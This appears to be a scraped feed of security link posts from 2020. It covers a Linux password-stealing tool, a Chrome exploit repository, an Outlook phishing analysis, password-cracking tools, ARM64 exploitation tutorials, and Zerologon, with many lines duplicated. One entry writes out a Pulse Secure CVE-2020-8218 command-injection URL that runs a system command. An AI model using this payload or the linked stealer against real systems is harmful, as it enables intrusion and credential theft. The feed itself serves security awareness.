Impost3r is a tool that aim to steal many kinds of linux passwords(including ssh,su,sudo) written by C
https://github.com/ph4ntonn/Impost3r/blob/master/README_EN.md
https://github.com/ph4ntonn/Impost3r/blob/master/README_EN.md
GitHub
Impost3r/README_EN.md at master · ph4ntonn/Impost3r
👻Impost3r -- A linux password thief. Contribute to ph4ntonn/Impost3r development by creating an account on GitHub.
1day exploit for chrome version <= 83.0.4103.61
https://github.com/r4j0x00/exploits
https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974
https://github.com/r4j0x00/exploits
https://github.com/v8/v8/commit/85bc1b0cab31cc064efc65e05adb81fee814261b#diff-2e2c5645d87dabecd3793b1f10300974
GitHub
GitHub - r4j0x00/exploits
Contribute to r4j0x00/exploits development by creating an account on GitHub.
CVE-2020-8218 : Pulse Secure SSL-VPN post-auth RCE
hxxps://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc
hxxps://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc
https://isc.sans.edu/diary/26254
Broken phishing accidentally exploiting Outlook zero-day
When we think of zero-days, what comes to mind are usually RCEs or other high-impact vulnerabilities. Zero-days, however, come in all shapes and sizes and many of them are low impact, as is the vulnerability we’re going to discuss today. What is interesting about it, apart from it allowing a sender of an e-mail to include/change a link in an e-mail when it is forwarded by Outlook, is that I noticed it being exploited in a low-quality phishing e-mail by what appears to be a complete accident.
#analysis #phishing #exploit
Broken phishing accidentally exploiting Outlook zero-day
When we think of zero-days, what comes to mind are usually RCEs or other high-impact vulnerabilities. Zero-days, however, come in all shapes and sizes and many of them are low impact, as is the vulnerability we’re going to discuss today. What is interesting about it, apart from it allowing a sender of an e-mail to include/change a link in an e-mail when it is forwarded by Outlook, is that I noticed it being exploited in a low-quality phishing e-mail by what appears to be a complete accident.
#analysis #phishing #exploit
SANS Internet Storm Center
Broken phishing accidentally exploiting Outlook zero-day
Broken phishing accidentally exploiting Outlook zero-day, Author: Jan Kopriva
Offensive security officialy announces it launch of dedicated lab play grounds with previous oscp retired machines added occasionally and upto 3hrs of free acess to all
https://www.offensive-security.com/labs/individual/?utm_campaign=Proving%20Grounds%20Individual&utm_content=138805717
https://www.offensive-security.com/labs/individual/?utm_campaign=Proving%20Grounds%20Individual&utm_content=138805717
OffSec
Proving Grounds: Practice - Starting at $19 USD/month | OffSec
Train your team's penetration testing skills in a hosted virtual lab network: the Proving Grounds. Now available for enterprise customers.
https://github.com/mxrch/penglab
Penglab
Penglab is a ready-to-install setup on Google Colab for cracking passwords with an incredible power, really useful for CTFs.
#tools #opensource #crack #gpu
Penglab
Penglab is a ready-to-install setup on Google Colab for cracking passwords with an incredible power, really useful for CTFs.
#tools #opensource #crack #gpu
GitHub
GitHub - mxrch/penglab: 🐧 Abuse of Google Colab for cracking hashes.
🐧 Abuse of Google Colab for cracking hashes. Contribute to mxrch/penglab development by creating an account on GitHub.
HashCat added support to crack password-protected RAR 3 archives without header encryption (both compressed and uncompressed).
https://github.com/hashcat/hashcat/pull/2542
https://github.com/hashcat/hashcat/pull/2542
GitHub
Fixes #1334: Added -m 23700/23800 = RAR3-p cracking by philsmd · Pull Request #2542 · hashcat/hashcat
This new pull request adds both uncompressed (-m 23700) and compressed (-m 23800) password-protected RAR3 cracking support (where the headers are not encrypted, RAR3-hp was already supported by -m ...
ARM64 Reversing and Exploitation
Part 1: http://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow/
Part 2: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/
Part 3: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/
Part 1: http://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow/
Part 2: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/
Part 3: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/
Prateekg147
ARM64 Reversing and Exploitation Part 1 - ARM Instruction Set + Simple Heap Overflow
Hi Everyone ! In this blog series, we will be understanding the ARM instruction set and using that to reverse ARM Binaries followed by writing exploits for them. So let’s start with the basics of ARM64.
StreamDivert: Relaying (specific) network connections
The first part of this blog will be the story of how this tool found it’s way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.
https://research.nccgroup.com/2020/09/10/streamdivert-relaying-specific-network-connections/
#redteaming #windows #tools
The first part of this blog will be the story of how this tool found it’s way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.
https://research.nccgroup.com/2020/09/10/streamdivert-relaying-specific-network-connections/
#redteaming #windows #tools
Iran denies any involvement in the attack against 2020 US election
https://ift.tt/3ihEQud
https://ift.tt/3ihEQud
Security Affairs
Iran denies any involvement in the attack against 2020 US election
Iranian government denies Microsoft's allegations related to alleged attacks against individuals involved in 2020 US presidential election
Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)
https://www.secura.com/pathtoimg.php?id=2055
https://www.secura.com/pathtoimg.php?id=2055
English
404 Page
Unfortunately, this page cannot be found.